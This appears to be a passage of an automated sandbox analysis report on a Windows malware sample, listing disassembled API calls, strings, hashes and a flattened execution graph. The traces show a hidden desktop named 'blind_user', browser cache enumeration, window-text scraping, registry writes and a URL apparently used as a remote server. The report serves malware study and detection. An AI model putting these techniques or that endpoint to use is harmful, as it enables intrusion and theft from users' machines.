                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2708 403840 printf 2709 403880 2708->2709 2710 403884 printf 2709->2710 2711 40386d printf 2709->2711 2711->2709 2717 4052e0 2718 4052ec strcat strcat 2717->2718 2734 40431f 2718->2734 2721 405360 2722 40537c CreateProcessA 2721->2722 2723 405469 2722->2723 2724 4053ac CloseHandle sprintf 2722->2724 2725 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2723->2725 2726 405413 2724->2726 2727 4054d0 2725->2727 2728 4053e5 FindWindowA 2726->2728 2729 40541d 2726->2729 2728->2729 2730 405402 Sleep 2728->2730 2729->2723 2731 405421 Sleep 2729->2731 2730->2726 2732 405434 Sleep 2731->2732 2733 40543e GetWindowTextA 2731->2733 2732->2733 2733->2723 2735 404341 GetCurrentThreadId GetThreadDesktop 2734->2735 2736 404364 CreateDesktopA 2734->2736 2737 40438e SetThreadDesktop 2735->2737 2738 40435f memset 2735->2738 2736->2737 2736->2738 2737->2738 2738->2721 2738->2722 2841 401581 2842 4015c8 2841->2842 2843 4015a2 rand 2842->2843 2844 4015cc 2842->2844 2843->2842 2739 403562 GetModuleFileNameA 2740 403588 2739->2740 3001 402ba3 3004 402a89 3001->3004 3002 402cd2 3003 402cad GetCurrentProcessId 3003->3004 3004->3002 3004->3003 3005 402b2a GetModuleHandleA GetProcAddress 3004->3005 3005->3004 2741 4077e4 2742 407808 2741->2742 2749 40789e 2741->2749 2743 407820 SetFocus 2742->2743 2744 40782b 2742->2744 2742->2749 2743->2744 2745 407833 SetFocus 2744->2745 2746 40783e 2744->2746 2745->2746 2747 407857 2746->2747 2748 40784c SetFocus 2746->2748 2750 40786a 2747->2750 2751 40785f SetFocus 2747->2751 2748->2747 2754 407910 2749->2754 2755 4078fe CallWindowProcA 2749->2755 2752 407872 SetFocus 2750->2752 2753 40787d 2750->2753 2751->2750 2752->2753 2753->2749 2756 407885 SetFocus 2753->2756 2755->2754 2756->2749 2845 405c09 lstrlenA GetTickCount srand 2878 40509b 2845->2878 2850 405f54 2851 405caf ExpandEnvironmentStringsA 2892 40570c 2851->2892 2854 405ceb strcat strcat 2855 40431f 4 API calls 2854->2855 2856 405d14 memset 
2855->2856 2857 405d72 CreateProcessA 2856->2857 2858 405d56 2856->2858 2859 405da2 CloseHandle sprintf 2857->2859 2860 405f24 DeleteFileA TerminateProcess CloseHandle 2857->2860 2858->2857 2861 405e09 2859->2861 2860->2850 2862 405e13 2861->2862 2863 405ddb FindWindowA 2861->2863 2862->2860 2865 405e1b Sleep GetWindowTextA 2862->2865 2863->2862 2864 405df8 Sleep 2863->2864 2864->2861 2866 405e50 2865->2866 2866->2860 2931 405613 2866->2931 2868 405e6b 2868->2860 2869 405e76 CopyFileA 2868->2869 2870 403619 5 API calls 2869->2870 2871 405e9c DeleteFileA lstrlenA strncmp 2870->2871 2872 405ec6 lstrlenA 2871->2872 2873 405eef 2871->2873 2939 403743 CreateFileA 2872->2939 2875 403743 4 API calls 2873->2875 2876 405eea LocalFree 2875->2876 2876->2860 2879 4050ea 2878->2879 2880 4050b6 sprintf 2879->2880 2881 4050f8 2879->2881 2942 4041f4 2880->2942 2882 4041f4 4 API calls 2881->2882 2884 40510e 2882->2884 2945 4041c3 lstrlenA 2884->2945 2887 40429c RegOpenKeyExA 2888 4042e0 RegQueryValueExA 2887->2888 2889 4042dc 2887->2889 2890 404304 RegCloseKey 2888->2890 2891 4042f8 RegCloseKey 2888->2891 2889->2850 2889->2851 2890->2889 2891->2889 2893 4079e4 2892->2893 2894 405719 GetTempPathA 2893->2894 2895 405746 2894->2895 2895->2895 2953 4015ea 2895->2953 2898 405798 strcat 2899 4057ac rand 2898->2899 2900 4057e7 rand 2899->2900 2901 4057be rand sprintf 2899->2901 2902 4057f9 strcat 2900->2902 2903 40580d strcat rand 2900->2903 2901->2900 2902->2903 2904 405839 strcat 2903->2904 2905 40584d rand 2903->2905 2904->2905 2906 405888 sprintf rand 2905->2906 2907 40585f rand sprintf 2905->2907 2908 4058c3 strcat 2906->2908 2909 4058d7 strcat rand 2906->2909 2907->2906 2908->2909 2910 405911 strcat rand 2909->2910 2911 4058fd strcat 2909->2911 2912 405966 strcat rand 2910->2912 2913 40593d rand sprintf 2910->2913 2911->2910 2914 4059a0 strcat rand 2912->2914 2915 40598c strcat 2912->2915 2913->2912 2916 4059d2 strcat 2914->2916 2917 4059e6 strcat rand 2914->2917 2915->2914 
